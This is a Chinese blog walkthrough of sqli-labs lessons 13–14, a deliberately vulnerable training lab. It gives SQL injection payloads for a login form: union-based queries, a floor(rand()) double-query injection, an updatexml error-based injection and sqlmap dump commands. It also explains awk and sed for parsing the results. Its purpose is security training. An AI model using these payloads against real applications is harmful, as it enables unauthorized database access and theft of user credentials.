sqlilabs less13~14

已于 2022-07-10 01:04:25 修改
阅读量273 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
于 2022-07-01 01:04:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/125538922
版权

sqlilabs less-13~14

手动和脚本

在这里插入图片描述
很明显,精准的报错给了我们想要的东西。
构造以下SQL语句

select * from table where uname = ('') and password = ('')

查询表的时候发现没有返回,只有登陆成功

1') union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() #

在这里插入图片描述

在构造语句的时候发现似乎能利用报错注入
在这里插入图片描述

1') union select count(*),concat((select table_name from information_schema.tables where table_schema=database()limit 0,1),floor(rand()*2))a from information_schema.tables group by a#
通过修改limit n,1的n来查询不同行

因为这个双注入是随机性,可能需要几次才能成功
在这里插入图片描述

字段名和数据同理,可以考虑burp suite 或者写个脚本。
在这里插入图片描述

在这里插入图片描述
嗯,来解释一下awk sed tr作用吧

awk -F 分隔符(比如“ > ”)以 > 为分隔符,从开头到第一个分隔符 > 为1,从第一个 > 到第二个为2…… {print$n} n是第n个 1就是从头到第一个分隔符
tr a b 是把a替换为b
sed ‘s/a/b/g’ s是替代 把a替换为b g是s替换命令里面的一个标记作用是替换所有的a,如果不加g只替换第一个a

‘s/(.*),/\1,/’ 会查找最后一个,替换为空 为什么呢
因为 .是匹配换行符以外单个字符, ,加上后面的单独字符
在这里插入图片描述

是重复前面的匹配N次或者0次 因为第一次是,真 再重复一次就是,真后面的单独字符 ,真好 因为重复N次所以,后面全部(除了换行符)全部都能匹配
在这里插入图片描述
于是我们给. 加上括号表示子表达式的开始和结束 因为没有限制所以匹配的是全体
在这里插入图片描述
然后如果我在(.*)后面加上一个英文逗号就变成了匹配末尾有英文逗号的那部分
在这里插入图片描述
是不是可以把最后一个英文逗号替换掉呢 上机试试!
在这里插入图片描述
可以看到替换掉了英文逗号以及它之前所有的字符,因为前两行末尾是英文逗号所以全行都被替换为感叹号,而第三行末尾是一串字符所以只有英文逗号之前被替换为感叹号了。那怎么不对啊。仔细想想,它匹配的是最后一个英文逗号以及它之前所有的,如果我把匹配的替换为匹配的会怎么样(注意\1会捕捉第一个()内的指定字符 \2则是第二个()内的)
在这里插入图片描述
是不是最后一个英文逗号没了

再来举个例子
在这里插入图片描述

把括号内的ab加上外面的c 也就是abc(注意后面没有加g,所以只替换第一个abc)替换为\1所引用的第一个括号内的字符ab,使用\2呢,就是把第一个abc替换为c
在这里插入图片描述

推荐自己动手加强理解

基于错误

前期构造sql语句打database时候打错意外发现还可能有基于错误的注入
在这里插入图片描述

1') and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)#

在这里插入图片描述

sqlmap

先抓包然后保存在文本文件 使用

sqlmap -r xx.txt

在这里插入图片描述
然后用 -dbs 、-D database_name -tables 和 -D database_name -T table_name --dump
h

less-14

less14和less13同理 sql语句由英文单引号加括号变成了英文双引号
在这里插入图片描述

永远是深夜有多好。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs(13
jimggg的博客
03-20 235
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了。 方法一,报错型 既然它返回错误信息了,说明有回显,可以报错注入。 样例payload uname=admin') and extractvalue(1,conc...
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 278
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
sqli-labs (less-13)
kukudeshuo的博客
03-09 960
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
sqli-labs less13
qq_45106794的博客
10-18 360
#sqli-labs less13 由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。 然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现 所以可以判断字段数为2 接下来试试adm...
sqli-labs/Less-13
m0_71299382的博客
11-18 285
sqli-labs第十三关
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqlilabs 75关中文目录
01-11
SQLiLabs是一个专门用于学习和练习SQL注入技术的在线靶场。这个中文目录旨在为那些对英语不熟悉的学习者提供清晰的指引,使他们能够更好地理解和实践SQL注入的各种类型。 1. **基于错误的注入**:在Less-1到Less-4...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs实验指导手册
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli labs less 13
Xiaoxiaoqiang_的博客
03-02 125
小学生
Sqli-labs之Less-13和Less-14
→_→
04-05 1151
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
Sqli-labs Less13-14 报错型盲注 - POST
kevinhanser
08-09 411
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 13: POST - Double Injection - Single Quotes - with twist 测试漏洞 username 输入 admin' password 输入 任意内容 显示报错信息 You have an error in your SQL syntax; ...
Sqli-labs靶场第13关详解[Sqli-labs-less-13]
最新发布
m0_73615178的博客
03-02 628
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
LESS-13
qq_44598397的博客
03-21 378
LESS-13 源码: 输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。 输入:admin’)# 因为这里有报错,所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入: admin’) and left(database(),1)>‘a’#(可以用二分法进...
sqli-labs:less-13
羽的博客
07-24 177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-lab教程 less-13,14
xiaoyuhensuai的博客
07-09 322
这一题我们需要使用burp suite。首先我们在username和password中随便输入一串数字或字母,然后进入抓包开始操作。首先我们来对数据库名进行查询: 如下图所示:可以看出数据库名为“security” 接着我们来继续查询数据库有哪些: 如下图所示: 其次来查看security数据库中所有的数据表: 如下图所示:接着我们来显示users中的字段: 如图下图所示: 查找原SQL语句:$sql="SELECT username, password FROM users WHERE
Sqli-labs 复习 Less13-14 报错型盲注 - POST
kevinhanser
08-11 400
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 报错型 SQL 盲注 函数讲解 盲注用到的函数 rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 ...
sqli labs less 7
07-11
1. 打开 SQLi Labs 平台,并找到 Less 7 的挑战。 2. 分析页面,确定存在注入漏洞的参数或输入框。 3. 尝试在注入点使用 UNION 注入语法。 4. 通过逐渐增加 UNION 查询的列数,直到成功获取到目标信息。 5. 利用 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值